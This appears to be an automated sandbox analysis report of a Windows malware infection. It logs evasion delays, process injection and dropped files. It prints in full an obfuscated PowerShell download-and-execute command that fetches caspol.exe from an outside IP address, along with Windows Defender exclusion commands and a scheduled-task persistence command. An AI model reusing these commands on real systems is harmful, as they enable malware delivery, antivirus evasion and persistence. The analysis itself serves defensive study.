Source: C:\Users\user\AppData\Roaming\caspol.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\caspol.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1258	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5532	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3050	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5451	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1282
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1572
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2335
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1455
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2152
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3173
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 792
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2924
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1608
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1545
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2333
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3335
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1386
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2124
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1760
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2140

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fkur3fvp\fkur3fvp.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4i1jhsy0\4i1jhsy0.dll			Jump to dropped file

Source: C:\Windows\System32\mshta.exe TID: 3664	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3888	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3988	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3836	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3928	Thread sleep count: 3050 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3928	Thread sleep count: 5451 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3964	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3972	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe TID: 724	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe TID: 3104	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3068	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1592	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 928	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3040	Thread sleep count: 2335 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2124	Thread sleep count: 1455 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 728	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1548	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2960	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\taskeng.exe TID: 2756	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Roaming\caspol.exe TID: 3324	Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe TID: 3736	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe TID: 1704	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3984	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2356	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3732	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3924	Thread sleep count: 792 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3924	Thread sleep count: 2924 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4084	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4056	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4004	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 3852	Thread sleep time: -480000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1700	Thread sleep count: 1608 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 540	Thread sleep count: 1545 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1892	Thread sleep time: -240000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1976	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 424	Thread sleep count: 2333 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 424	Thread sleep count: 3335 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 804	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 772	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1920	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\caspol.exe TID: 976	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\caspol.exe TID: 2108	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1180	Thread sleep count: 1386 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1180	Thread sleep count: 2124 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3100	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3160	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1972	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3164	Thread sleep count: 1760 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2236	Thread sleep count: 2140 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3120	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3104	Thread sleep time: -120000s >= -30000s

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\caspol.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\caspol.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe

Code function: 31_2_0040317B mov eax, dword ptr fs:[00000030h]

31_2_0040317B

Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe

Code function: 31_2_00402B7C GetProcessHeap,HeapAlloc,

31_2_00402B7C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\caspol.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\caspol.exe	Memory written: C:\Users\user\AppData\Roaming\caspol.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Memory written: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\caspol.exe	Memory written: C:\Users\user\AppData\Roaming\caspol.exe base: 400000 value starts with: 4D5A

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fkur3fvp\fkur3fvp.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1ED7.tmp" "c:\Users\user\AppData\Local\Temp\fkur3fvp\CSC55312E8BACB34CD3B1B97BFED1B34D9.TMP"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmp9F6B.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpBD09.tmp"
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Process created: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Process created: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4i1jhsy0\4i1jhsy0.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8B10.tmp" "c:\Users\user\AppData\Local\Temp\4i1jhsy0\CSC6DB7E53F49C54638AC449C3AA969DEC.TMP"
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
